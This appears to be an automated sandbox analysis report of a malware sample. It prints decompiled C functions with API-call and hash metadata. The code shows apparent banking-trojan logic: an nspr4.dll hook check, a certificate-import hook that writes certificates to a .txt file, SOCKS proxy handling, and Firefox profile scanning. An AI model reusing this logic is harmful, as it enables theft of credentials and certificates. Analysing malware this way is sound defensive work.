          • Part of subcall function 004114C6: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 004114DB
          • Part of subcall function 004114A6: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00412152,?,00000000,00000000,00000000,00000000), ref: 004114B8
        • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004121FA
        • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00412213
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00412237
        • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041223F
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: File$PointerWrite$BuffersFlush
        • String ID:
        • API String ID: 1289656144-0
        • Opcode ID: 01c7e41dfe092421394b7ca12780850e3ded4af82079477d2a483c7668920bb9
        • Instruction ID: 454e175e791e213352fef1a7572d9edf7f3ee0974e81cd1a9424a54dd0ebadc0
        • Opcode Fuzzy Hash: 01c7e41dfe092421394b7ca12780850e3ded4af82079477d2a483c7668920bb9
        • Instruction Fuzzy Hash: 70315C76800109EFDF119FE4DD41EEEBBB9AF48358F10856AF250A1160D37A8AA5DB24
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040AB15(void* __ebx, void* __ecx) {
        				char _v20;
        				char* _v84;
        				char _v92;
        				char _v196;
        				char _v716;
        				void* __edi;
        				void* __esi;
        				void* _t15;
        				void* _t31;
        				void* _t35;
        				void* _t36;
        				char _t37;
        				void** _t43;
        
        				_t36 = __ecx;
        				_t35 = __ebx;
        				_t15 =  *(__ebx + 0x180);
        				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
        					_t43 = _t35 + 0x17c;
        					E0040DBD1(_t43);
        					E0041349C(_t36,  &_v716, 1);
        					E00413140(0x2937498d,  &_v196, 0);
        					_t37 = 0x44;
        					E0040C275( &_v92,  &_v92, 0, _t37);
        					_v92 = _t37;
        					_v84 =  &_v196;
        					ResetEvent( *(_t35 + 0xc));
        					if(E0040DA89( &_v716, 0x4017b8, 0,  &_v92,  &_v20) != 0) {
        						E0040C1FE(_t43,  &_v20, 0x10);
        						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
        							goto L6;
        						} else {
        							TerminateProcess( *_t43, 0);
        							E0040DBD1(_t43);
        							goto L3;
        						}
        					} else {
        						L3:
        						_t31 = 0;
        					}
        				} else {
        					L6:
        					_t31 = 1;
        				}
        				return _t31;
        			}

















        APIs
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040AB2D
        • ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 0040AB87
        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,004017B8,00000000,?,?), ref: 0040ABC3
        • TerminateProcess.KERNEL32(?,00000000), ref: 0040ABD0
          • Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE0
          • Part of subcall function 0040DBD1: CloseHandle.KERNEL32(?,0001FEE6,00416AB0,00000000,00423E80,00000000,00416BE5,00000000,00000000,0000004C,2937498D,?,00000000), ref: 0040DBE9
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
        • String ID:
        • API String ID: 401097067-0
        • Opcode ID: e224464e566f025fdcb3655e124393a0ebc3103a03e07e64571a0e30eef9dac9
        • Instruction ID: 35075be0d4c8d2b6e39a3b8b18d8cba90e43fbdabfa54f6fb1705909fe8a0c4a
        • Opcode Fuzzy Hash: e224464e566f025fdcb3655e124393a0ebc3103a03e07e64571a0e30eef9dac9
        • Instruction Fuzzy Hash: E3117571900309AADF10ABA5DC89FEF777DEF44704F00057AF905F60A5E638A945DB29
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 64%
        			E00414633(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
        				void* __edi;
        				void* _t12;
        				intOrPtr _t13;
        				void* _t16;
        				void* _t17;
        				void* _t21;
        				void* _t22;
        				void* _t23;
        				intOrPtr _t24;
        				void* _t28;
        				intOrPtr* _t29;
        				intOrPtr _t31;
        
        				if(E004132A1() != 0) {
        					_t29 = _a16;
        					_t24 = _a12;
        					_t12 =  *0x4238d4(_a4, 0, _t24, _t29, _t23, _t28, _t17);
        					_t13 =  *0x4238d0(_a4, _a8, _t24, _t29);
        					_a4 = _t13;
        					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
        						EnterCriticalSection(0x423dd4);
        						if(( *0x423dec & 0x00000001) == 0) {
        							_t31 =  *_t29;
        							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
        								_t16 = 0;
        							} else {
        								_t16 = E0041D672(_t21, _t22, _t31);
        							}
        							if(_t16 != 0) {
        								 *0x423dec =  *0x423dec | 0x00000001;
        							}
        						}
        						LeaveCriticalSection(0x423dd4);
        					}
        					return _a4;
        				}
        				goto ( *0x4238d0);
        			}
















        APIs
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • EnterCriticalSection.KERNEL32(00423DD4), ref: 0041468A
        • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 004146A4
        • LeaveCriticalSection.KERNEL32(00423DD4), ref: 004146C5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
        • String ID: nspr4.dll
        • API String ID: 3081114022-741017701
        • Opcode ID: d19470e1ff7c0ca9fa0abe7322e3bb5966c380076100c5bacfd6d74cb8a4c9be
        • Instruction ID: ce00e6e431a2fa2cb08a3204435a842d2cad010c15c085ededd1e12562ff0545
        • Opcode Fuzzy Hash: d19470e1ff7c0ca9fa0abe7322e3bb5966c380076100c5bacfd6d74cb8a4c9be
        • Instruction Fuzzy Hash: 90118F31300215ABCB21AF21ED44BD77BB8EB86759F04402AFC05A7261D73DA982DB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040F92F(HANDLE* _a4) {
        				struct tagMSG _v28;
        				long _t16;
        
        				while(1) {
        					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
        					if(_t16 != 1) {
        						break;
        					}
        					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
        						if(_v28.message != 0x12) {
        							TranslateMessage( &_v28);
        							DispatchMessageW( &_v28);
        							continue;
        						}
        						goto L5;
        					}
        				}
        				L5:
        				return _t16;
        			}






        APIs
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageMultipleObjectsPeekWait
        • String ID:
        • API String ID: 3986374578-0
        • Opcode ID: cd971c133abe50a50af2c82c45dc09d100e148dcef08147592c73ff6ce74fdaa
        • Instruction ID: 23f8183d60ef3ae744df45370f2e113eb589f0b7b49e26db241ecbf190a487e7
        • Opcode Fuzzy Hash: cd971c133abe50a50af2c82c45dc09d100e148dcef08147592c73ff6ce74fdaa
        • Instruction Fuzzy Hash: CAF0F6721043097BD720ABA9DD48EA7BBACEB457A4F050536FA00F31B0D276980886B5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041A945(void* __eflags) {
        				void* _t1;
        				void* _t2;
        				long _t6;
        				void* _t12;
        
        				_t1 = E0041317B(_t12, __eflags, 0x19367401, 1);
        				_t19 = _t1;
        				if(_t1 != 0) {
        					_t2 = E004132A1();
        					__eflags = _t2;
        					if(_t2 == 0) {
        						L7:
        						E0040F995(_t19);
        						__eflags = 0;
        						return 0;
        					}
        					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
        					_t6 = WaitForSingleObject( *0x423d64, 0x1388);
        					while(1) {
        						__eflags = _t6 - 0x102;
        						if(_t6 != 0x102) {
        							break;
        						}
        						E0041D76E();
        						_t6 = WaitForSingleObject( *0x423d64, 0x1388);
        					}
        					goto L7;
        				}
        				return _t1 + 1;
        			}








        APIs
          • Part of subcall function 0041317B: CreateMutexW.KERNEL32(004238D8,00000000,?,?,?,?,?), ref: 0041319C
        • GetCurrentThread.KERNEL32 ref: 0041A969
        • SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0041A970
        • WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0041A988
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
        • String ID:
        • API String ID: 3441234504-0
        • Opcode ID: 41e7cdec3676510d54d0425389f331f6ca7fa78b0f8602894d3aa2f2e6f5c0a1
        • Instruction ID: 48b2b1acd8c57d0a9d177a85a32fa635832d873c69e7d770c1b8f1f1463506ad
        • Opcode Fuzzy Hash: 41e7cdec3676510d54d0425389f331f6ca7fa78b0f8602894d3aa2f2e6f5c0a1
        • Instruction Fuzzy Hash: 11F059F22143083AD6227BA5AD45EDB3A1DC7403A9B210437F511A21B2D5294CD246BE
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E0041C01D(void* __eflags, signed int _a4) {
        				char _v9;
        				char _v13;
        				char _v20;
        				signed int _v24;
        				signed int _v29;
        				short _v31;
        				signed char _v32;
        				intOrPtr _v36;
        				signed int _v48;
        				short _v50;
        				char _v52;
        				char _v312;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				void* _t59;
        				void* _t61;
        				short _t77;
        				void* _t79;
        				void* _t84;
        				char _t103;
        				char* _t105;
        				signed int _t115;
        				void* _t125;
        				intOrPtr _t126;
        				void* _t127;
        				char _t129;
        				void* _t131;
        				intOrPtr _t132;
        				void* _t133;
        
        				_t110 = _a4;
        				_t59 = E0040F77A(_t110);
        				_push(0);
        				_push( &_v32);
        				_t61 = 7;
        				_v24 = 0 | _t59 == 0x00000017;
        				if(E0040F175(_t61, _t110) != 0) {
        					while(E0040F175(1, _t110,  &_v9, 0) != 0) {
        						if(_v9 == 0) {
        							_t115 = _v29;
        							_t116 = _t115 << 0x10;
        							_v13 = 0x5a;
        							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
        								L20:
        								_v9 = 1;
        								if(_v13 != 0x5a) {
        									L44:
        									return E0041BFA7(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
        								}
        								E0040C275( &_v52,  &_v52, 0, 0x10);
        								_t77 = 2;
        								_v52 = _t77;
        								_t79 = (_v32 & 0x000000ff) - 1;
        								if(_t79 == 0) {
        									_v50 = _v31;
        									_v48 = _v29;
        									_t127 = E0040F20A( &_v52);
        									if(_t127 == 0xffffffff) {
        										L23:
        										_v13 = 0x5b;
        										goto L44;
        									}
        									E0040F5BD(_t116, _t127);
        									_t84 = E0041BFA7(_t110, _t127, 0x5a, _v24);
        									if(_t84 != 1) {
        										if(_t84 != 0xffffffff) {
        											_v9 = 0;
        										} else {
        											_v13 = 0x5b;
        										}
        									} else {
        										_push(_t127);
        										_t84 = E0040F3BE(_t110);
        									}
        									E0040F565(_t84, _t127);
        									if(_v9 != 1 || _v13 == 0x5a) {
        										L34:
        										return _v9;
        									} else {
        										goto L44;
        									}
        								}
        								if(_t79 == 1) {
        									_t129 = E0040F304( &_v52, 1);
        									_v20 = _t129;
        									if(_t129 == 0xffffffff) {
        										goto L23;
        									}
        									_t125 = E0041BFA7(_t110, _t129, 0x5a, _v24);
        									if(_t125 != 1) {
        										L31:
        										E0040F565(_t89, _t129);
        										if(_t125 == 0xffffffff) {
        											goto L23;
        										}
        										if(_t125 != 1) {
        											_v9 = 0;
        										}
        										goto L34;
        									}
        									_t126 = E0040F535( &_v20,  &_a4);
        									_v36 = _t126;
        									E0040F565(_t93, _v20);
        									if(_t126 != 0xffffffff) {
        										E0040F5BD(_t116, _t126);
        										_t110 = _a4;
        										_t125 = E0041BFA7(_a4, _t126, 0x5a, _v24 | 0x00000002);
        										if(_t125 == 1) {
        											_push(_v36);
        											_t89 = E0040F3BE(_t110);
        										}
        										_t129 = _v36;
        										goto L31;
        									}
        									_t110 = _a4;
        									_v13 = 0x5b;
        									goto L44;
        								}
        								goto L23;
        							}
        							_t131 = 0;
        							while(1) {
        								_t116 = _t110;
        								if(E0040F175(1, _t110,  &_v9, 0) == 0) {
        									goto L1;
        								}
        								_t103 = _v9;
        								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
        								if(_t103 == 0) {
        									_t105 =  &_v312;
        									_v20 = 0;
        									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
        									if(_t105 == 0) {
        										_t132 = _v20;
        										while(_t132 != 0) {
        											if( *((intOrPtr*)(_t132 + 4)) == 2) {
        												E0040C1FE( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
        												L19:
        												__imp__freeaddrinfo(_v20);
        												if(_t132 == 0) {
        													goto L12;
        												}
        												goto L20;
        											}
        											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
        										}
        										goto L19;
        									}
        									L12:
        									_v13 = 0x5b;
        									goto L20;
        								}
        								_t131 = _t131 + 1;
        								if(_t131 <= 0xff) {
        									continue;
        								}
        								goto L1;
        							}
        							goto L1;
        						}
        					}
        				}
        				L1:
        				return 0;
        			}


































        APIs
          • Part of subcall function 0040F77A: #6.WS2_32(?,?,?), ref: 0040F798
        • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0041C0EC
        • freeaddrinfo.WS2_32(?,?,?,00000004), ref: 0041C125
          • Part of subcall function 0040F5BD: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0041427D,00000000), ref: 0040F5D3
          • Part of subcall function 0041BFA7: #5.WS2_32(000000FF,?,00000000,00414093,?,00000000), ref: 0041BFCB
          • Part of subcall function 0040F3BE: #18.WS2_32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040F45E
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: freeaddrinfogetaddrinfo
        • String ID: Z
        • API String ID: 1109861670-1505515367
        • Opcode ID: 59cfe92271cc35a78d796e13227fcdcb31e4e3dfb2690ada9dbcb71ba9e7937a
        • Instruction ID: fdc04efec32a882b34bcffebf4bb7e6cd3fb7c41ba6f96698677505b711400e1
        • Opcode Fuzzy Hash: 59cfe92271cc35a78d796e13227fcdcb31e4e3dfb2690ada9dbcb71ba9e7937a
        • Instruction Fuzzy Hash: 5261E732E80258BBDF2096A8CC85AEF7B759F45314F04417BE915F32C2D67C8985CBA9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 60%
        			E00409B6E(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
        				char _v536;
        				char _v600;
        				char _v728;
        				char _v744;
        				struct _SYSTEMTIME _v760;
        				intOrPtr _v764;
        				intOrPtr _v772;
        				intOrPtr _v776;
        				char _v784;
        				void* __edi;
        				void* __esi;
        				void* _t47;
        				void* _t58;
        				intOrPtr* _t59;
        				void* _t61;
        				void* _t65;
        				intOrPtr* _t66;
        				void* _t67;
        				void* _t71;
        				char* _t74;
        				signed int _t76;
        				void* _t78;
        				void* _t79;
        
        				_t61 = __ecx;
        				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
        				_t59 = _a4;
        				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
        				_v776 = __eax;
        				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E004132A1() != 0) {
        					GetSystemTime( &_v760);
        					E004128DB(0xaa,  &_v600);
        					_t74 =  &_v744;
        					E004128DB(0xab, _t74);
        					E0040994D( &_v536, _t61);
        					_push(_v760.wYear & 0x0000ffff);
        					_push(_v760.wMonth & 0x0000ffff);
        					_push(_v760.wDay & 0x0000ffff);
        					_push(_t74);
        					_push( &_v536);
        					_push( &_v600);
        					_t65 = 0x3e;
        					_t47 = E0040CEB5( &_v600, _t65,  &_v728);
        					_t79 = _t78 + 0x18;
        					if(_t47 > 0 && E0040925A(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
        						_t66 = _a8;
        						if(_t66 != 0 &&  *_t66 != 0) {
        							 *((short*)(E0040C1FE(_t79 + 0x48 + E0040CD11( &_v728) * 2, L".txt", 8) + 8)) = 0;
        							_t64 = _t66;
        							if(E0040D019(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
        								E0040925A(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
        								E0040D007( &_v784);
        							}
        						}
        					}
        				}
        				return _v776;
        			}



























        APIs
        • PFXImportCertStore.CRYPT32(?,?,?), ref: 00409B87
          • Part of subcall function 004132A1: WaitForSingleObject.KERNEL32(00000000,00407D52,00000310,00000000,00000310,909011A5,00000002), ref: 004132A9
        • GetSystemTime.KERNEL32(?), ref: 00409BD3
          • Part of subcall function 0040994D: GetUserNameExW.SECUR32(00000002,?,?), ref: 00409962
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
        • String ID: .txt
        • API String ID: 1412380219-2195685702
        • Opcode ID: 9d90e6ad6bdbbb1a9ea4ef99a9c5c2329479eae1f6188420c4bf968b35768a2a
        • Instruction ID: df1f6b6c04e867f659c2950d60bdbbbbc715dda6fa5453833b5e9b0218e6adf6
        • Opcode Fuzzy Hash: 9d90e6ad6bdbbb1a9ea4ef99a9c5c2329479eae1f6188420c4bf968b35768a2a
        • Instruction Fuzzy Hash: EC31D031508341AADB20AF55CD41BABB7E9AF89308F00053FB984A72D2D77AD945C766
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CoCreateInstance.OLE32(00404B0C,00000000,00004401,00404B1C,?,?,00000000,00000001), ref: 004177C1
        • CoCreateInstance.OLE32(00404ADC,00000000,00004401,00404AEC,?,?,00000000,00000001), ref: 00417814
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CreateInstance
        • String ID: D
        • API String ID: 542301482-2746444292
        • Opcode ID: cf720a1af7af2112a942e58ba2f9be920710b1e26a7f7afc94fada329f44055a
        • Instruction ID: a682e6a46b476f20ad2125105daf9ba79b2c3500b7f9930b23a7488541202ff4
        • Opcode Fuzzy Hash: cf720a1af7af2112a942e58ba2f9be920710b1e26a7f7afc94fada329f44055a
        • Instruction Fuzzy Hash: A6317CB2208305AFE710DF55C888DABBBFDAB84754F10092AFA5497280D734ED45CB66
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 63%
        			E0041081B(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
        				signed int _v14;
        				signed int _v16;
        				signed int _v20;
        				char _v284;
        				unsigned int _t24;
        				void* _t26;
        				signed int _t28;
        				signed int* _t29;
        				void* _t30;
        				void* _t41;
        				char* _t42;
        				void* _t45;
        				signed int _t46;
        				void* _t47;
        
        				_t45 = __ecx;
        				_t24 = E0040C1FE( &_v20, _a4, 0x10);
        				_v20 = _v20 ^ _t24;
        				_v16 = _v16 ^ _t24;
        				_v14 = _v14 ^ _t24 >> 0x00000010;
        				_t41 = 0;
        				_t26 = 0;
        				do {
        					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
        					_t26 = _t26 + 1;
        					if(_t26 == 4) {
        						_t26 = 0;
        					}
        					_t41 = _t41 + 1;
        				} while (_t41 < 8);
        				if(_a12 != 0) {
        					E0040C1FE( &_v284, _a12, 0x102);
        					E0040D63E( &_v284, _t41,  &_v20, 0x10);
        				}
        				_t28 = _a16 & 0x000000ff;
        				if(_t28 != 0) {
        					_t30 = _t28 - 1;
        					if(_t30 == 0) {
        						_t42 = L"Local\\";
        						_push(6);
        						goto L11;
        					} else {
        						if(_t30 == 1) {
        							_t42 = L"Global\\";
        							_push(7);
        							L11:
        							_pop(_t46);
        							E0040C563(_t46, _t42, _t45);
        							_t45 = _t45 + _t46 * 2;
        						}
        					}
        				}
        				_t29 =  &_v20;
        				__imp__StringFromGUID2(_t29, _t45, 0x28);
        				return _t29;
        			}


















        APIs
        • StringFromGUID2.OLE32(00000000,?,00000028,00413175,?,00000010,00000000,0001FE38), ref: 004108BC
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: FromString
        • String ID: Global\$Local\
        • API String ID: 1694596556-639276846
        • Opcode ID: 688bcf12deaa400928a09dfb99512953c9a451fbf2c6c90639904519df71f1d1
        • Instruction ID: 66ecb4ed94e550de57b73d167899809bd7a3235145e319b751bf6484d356e19d
        • Opcode Fuzzy Hash: 688bcf12deaa400928a09dfb99512953c9a451fbf2c6c90639904519df71f1d1
        • Instruction Fuzzy Hash: 6F11043151425DA6DB24EBB48C46BEF3669EF44700F00893BE142F61C1DAB8D5C6C7A8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00404F50(struct HINSTANCE__* __eax) {
        				char _v8;
        				char _v20;
        				char _v108;
        				void* __edi;
        				void* __esi;
        				struct HINSTANCE__* _t11;
        				void* _t18;
        				signed int _t25;
        				short* _t33;
        				void* _t43;
        
        				_t11 = __eax;
        				_t33 = __eax;
        				if( *0x423b0c > 1) {
        					_t11 = GetModuleHandleW(L"nspr4.dll");
        					if(_t11 != 0) {
        						if(_t33 == 0 ||  *_t33 == 0) {
        							return E00404CE2(__eflags, 0);
        						}
        						_t11 = E0040C1AA(2 + E0040CD11(_t33) * 4);
        						_t31 = _t11;
        						if(_t11 != 0) {
        							_t25 = E0040D019(E0040D0CE(_t33, _t31) | 0xffffffff, _t31,  &_v20);
        							_t11 = E0040C1C2(_t31);
        							if(_t25 != 0) {
        								_t18 = 0x31;
        								E004128A5(_t18,  &_v108);
        								_t43 = E0040CF86( &_v8,  &_v108, _v20);
        								_t11 = E0040D007( &_v20);
        								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
        								if((_t25 & 0xffffff00 | _t43 > 0x00000000) != 0) {
        									E00404CE2(_t44, _v8);
        									return E0040C1C2(_v8);
        								}
        							}
        						}
        					}
        				}
        				return _t11;
        			}














        APIs
        • GetModuleHandleW.KERNEL32(nspr4.dll,00000000,0001FE38,00000000), ref: 00404F6D
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
          • Part of subcall function 00404CE2: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00404D09
          • Part of subcall function 00404CE2: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 00404D5D
          • Part of subcall function 00404CE2: GetPrivateProfileIntW.KERNEL32 ref: 00404DC0
          • Part of subcall function 00404CE2: GetPrivateProfileStringW.KERNEL32 ref: 00404DEC
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: PrivateProfile$AttributesFileFolderFreeHandleHeapModulePathString
        • String ID: nspr4.dll$,A
        • API String ID: 119068519-422305081
        • Opcode ID: b061e85874be330fe20ce8b090b50ce2ce743a1d9dafaac78a68d651c67b7bb2
        • Instruction ID: ef3f0f02c76b746cc59349577793d23cf911c918ba8157663eaa76fd9c8287b3
        • Opcode Fuzzy Hash: b061e85874be330fe20ce8b090b50ce2ce743a1d9dafaac78a68d651c67b7bb2
        • Instruction Fuzzy Hash: A311E332A00200A7DF2177768C4269F77699F8031CF18013BFA01BB2E2DB7C8D05999D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E004194F0(void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v52;
        				char _v572;
        				void* __edi;
        				void* __esi;
        				char* _t22;
        				signed int _t30;
        				char* _t32;
        				void* _t34;
        
        				_t32 =  &_v52;
        				E004128DB(0x81, _t32);
        				_v16 = _t32;
        				_v28 = 0x26;
        				_v24 = 0x1a;
        				_v20 = 0x23;
        				E0040C275( &_v12,  &_v12, 0, 8);
        				_t30 = 0;
        				do {
        					_t22 =  &_v572;
        					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
        					_t37 = _t22;
        					if(_t22 == 0) {
        						_t29 =  &_v16;
        						E004118EB( &_v572,  &_v16, _t37, 1, 2, E00419255,  &_v12, 0, 0, 0);
        					}
        					_t30 = _t30 + 1;
        				} while (_t30 < 3);
        				if(_v8 <= 0) {
        					return E0040C1C2(_v12);
        				}
        				return E00417504(_t29, _v12, 0xcb);
        			}


















        APIs
        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 00419540
          • Part of subcall function 004118EB: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041192A
          • Part of subcall function 004118EB: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 00411951
          • Part of subcall function 004118EB: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041199B
          • Part of subcall function 004118EB: Sleep.KERNEL32(00000000,?,?), ref: 004119F8
          • Part of subcall function 004118EB: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00411A26
          • Part of subcall function 004118EB: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00411A38
          • Part of subcall function 0040C1C2: HeapFree.KERNEL32(00000000,00000000,0040D9B9,00000000,?,?,?,00412A7F,00000000,00412F59), ref: 0040C1D5
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
        • String ID: #$&
        • API String ID: 3438805939-3870246384
        • Opcode ID: 1d8df8f779fe98b02ed48fbef80eaac9d4c4e9ed3fe9fe3d1463b9d8abc28e5d
        • Instruction ID: bcdfd5bb5c9d5406af1c334a7b2343c7b4dba703b798cc1429183fc3ad7eeac1
        • Opcode Fuzzy Hash: 1d8df8f779fe98b02ed48fbef80eaac9d4c4e9ed3fe9fe3d1463b9d8abc28e5d
        • Instruction Fuzzy Hash: 4B11AC72A01228BADB20AB82DC49FDF7F7DEF41344F00416AF605B6180D7784B86CBA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 79%
        			E00419E11(void* __eflags) {
        				intOrPtr _v8;
        				char _v12;
        				char _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v60;
        				char _v580;
        				void* __edi;
        				void* __esi;
        				char* _t22;
        				signed int _t30;
        				char* _t32;
        				void* _t34;
        
        				_t32 =  &_v60;
        				E004128DB(0x95, _t32);
        				_v16 = _t32;
        				_v28 = 0x26;
        				_v24 = 0x1a;
        				_v20 = 0x23;
        				E0040C275( &_v12,  &_v12, 0, 8);
        				_t30 = 0;
        				do {
        					_t22 =  &_v580;
        					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
        					_t37 = _t22;
        					if(_t22 == 0) {
        						_t29 =  &_v16;
        						E004118EB( &_v580,  &_v16, _t37, 1, 2, E00419B82,  &_v12, 0, 0, 0);
        					}
        					_t30 = _t30 + 1;
        				} while (_t30 < 3);
        				if(_v8 <= 0) {
        					return E0040C1C2(_v12);
        				}
        				return E00417504(_t29, _v12, 0xcb);
        			}


















        APIs
